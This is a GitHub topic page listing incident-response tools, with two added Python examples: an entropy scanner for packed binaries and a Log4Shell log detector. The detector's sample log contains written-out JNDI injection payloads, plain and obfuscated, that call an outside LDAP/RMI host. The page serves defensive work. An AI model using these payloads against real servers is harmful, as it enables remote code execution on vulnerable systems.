There are 12 repositories under the incident-response-tooling topic.
A curated list of tools for incident response
TheHive: a Scalable, Open Source and Free Security Incident Response Platform
Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders
AWS CloudSaga - Simulate security events in AWS
AHA is an incident management & communication framework that alerts customers in real time when there are active AWS event(s). Customers with AWS Organizations get aggregated, account-level active events for all accounts in the Organization. Customers not using AWS Organizations still benefit from alerting at the account level.
RdpCacheStitcher is a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps.
A curated list of tools for incident response. With repository stars⭐ and forks🍴
Entropy scanner for Linux that detects packed or encrypted binaries associated with malware. Finds malicious files and Linux processes and reports them with cryptographic hashes.
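To show the core of what an entropy scanner like the one above does, here is an added example (not the repository's own code): it computes Shannon entropy per file, restricts the walk to ELF binaries by magic bytes, flags anything above an assumed threshold of 7.2 bits/byte, and emits a SHA-256 so hits can be checked against an allowlist or threat-intel feed. The threshold, the sample blobs and the function names are assumptions for illustration.

```python
import hashlib
import math
import os
import random
from collections import Counter

# Assumed threshold in bits per byte. Plain text sits around 4-5, ordinary compiled
# code around 6, while compressed, packed (UPX etc.) or encrypted payloads approach 8.0.
HIGH_ENTROPY_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_like_elf(data: bytes) -> bool:
    """ELF magic check, so a scan can restrict itself to Linux executables."""
    return data[:4] == b"\x7fELF"


def scan_blob(name: str, data: bytes, threshold: float = HIGH_ENTROPY_THRESHOLD) -> dict:
    """Score one blob: entropy, ELF flag, SHA-256 for lookups, and a suspicious verdict."""
    ent = shannon_entropy(data)
    return {
        "name": name,
        "size": len(data),
        "elf": looks_like_elf(data),
        "entropy": round(ent, 3),
        "sha256": hashlib.sha256(data).hexdigest(),
        "suspicious": ent >= threshold,
    }


def scan_path(root: str, threshold: float = HIGH_ENTROPY_THRESHOLD, elf_only: bool = True) -> list:
    """Walk a directory tree and return the high-entropy files (ELF binaries by default)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable or vanished (e.g. /proc entries): skip, do not abort
            if elf_only and not looks_like_elf(data):
                continue
            result = scan_blob(path, data, threshold)
            if result["suspicious"]:
                findings.append(result)
    return findings


# Constructed samples (not real malware): a repetitive shell script, and a pseudo-random
# blob standing in for a packed/encrypted payload, given an ELF header so elf_only passes.
LOW_ENTROPY_SAMPLE = b"#!/bin/sh\necho hello world\n" * 40


def make_high_entropy_sample(seed: int = 1337, size: int = 4096) -> bytes:
    rng = random.Random(seed)
    return b"\x7fELF" + bytes(rng.getrandbits(8) for _ in range(size))


if __name__ == "__main__":
    for name, blob in [("script.sh", LOW_ENTROPY_SAMPLE), ("packed.bin", make_high_entropy_sample())]:
        print(scan_blob(name, blob))
```

Entropy alone is a weak signal: legitimately compressed or stripped-and-packed binaries (BusyBox builds, Go binaries with embedded assets) score high too, which is why the hash is carried alongside, so each hit can be resolved against a known-good set before anyone treats it as malware.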
Forensic toolkit for iOS sysdiagnose feature
CLI program for automating the setup, configuration, and use of cybersecurity solutions
A collection of awesome tools, software, libraries, learning tutorials & videos, frameworks, best practices and technical resources about Incident Response & Management in Cybersecurity
Volatility MindMap & Cheat Sheet
Decloak Linux stealth rootkits hiding data with this simple memory-mapped I/O investigation tool.
Live system forensic collector
Scripts for ready-to-use Velociraptor instance deployment in Azure
CLI for selecting and back-testing CloudWatch alarm configuration
A Slack app used for incident management at Department for Education Digital
Cortex-Analyzers Modified - SecTeam/CERT/SOC Security orchestration tools on steroids
Incident management chatbot for DevOps
Go client library for accessing the Incident.io API
A curated list of tools for incident response
Get to the root cause of an issue, learn from it, and make sure it doesn’t happen again.
Tool to try to retrieve the Java class used as a dropper for the RCE in the context of the Log4Shell vulnerability.
PowerShell script to check log files for Log4Shell exploitation
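As an added example of the detection logic such a log-scanning script needs (not the repository's own code, and written in Python rather than PowerShell so it runs anywhere), the block below URL-decodes each line, collapses the nested `${lower:...}`, `${upper:...}` and `${...:-x}` lookups attackers use to hide the literal `${jndi:` from plain grep rules, and then reports the JNDI scheme. The log lines are constructed samples using a documentation-range IP address.

```python
import re
import urllib.parse

# Lookups that Log4j 2 resolves before it sees the "jndi" prefix. Attackers nest them so the
# raw line never contains "${jndi:"; resolving them first exposes the real payload.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${::-j}, ${env:NaN:-j}, ...
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode (twice, for double encoding) and collapse obfuscating lookups until stable."""
    for _ in range(2):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        collapsed = _CASE_LOOKUP.sub(r"\1", text)
        collapsed = _DEFAULT_LOOKUP.sub(r"\1", collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def detect_jndi(line: str):
    """Return the JNDI scheme (ldap, ldaps, rmi, dns, ...) if the line carries a lookup, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan_lines(lines):
    """Scan an iterable of log lines; return (line_no, scheme, line) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = detect_jndi(line)
        if scheme:
            hits.append((n, scheme, line.rstrip()))
    return hits


# Constructed access-log lines: plain payload, lower: obfuscation in the User-Agent,
# double URL-encoded ${::-x} obfuscation in the query string, and a benign request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 200 -',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 - "-" '
    '"${${lower:j}ndi:${lower:r}mi://203.0.113.7:1099/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D'
    '%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldaps%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 200 -',
    '198.51.100.9 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, scheme, line in scan_lines(SAMPLE_LOG):
        print(f"line {line_no}: jndi scheme={scheme}: {line}")
```

A hit only proves an attempt reached the logger; confirming exploitation means correlating it with outbound LDAP/RMI connections from the JVM host to the address in the payload, which is where the dropper-retrieval tool listed just above picks up.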
This is the workbench for designing and updating the "security-playbook" object template for the MISP project - https://github.com/MISP/misp-objects/blob/main/objects/security-playbook/definition.json
systeminfo command for offline system images
Debug a sample in Windows, also using API Monitor.
Introduction to SOC and related terminologies.
Check a domain in question against VirusTotal (VT)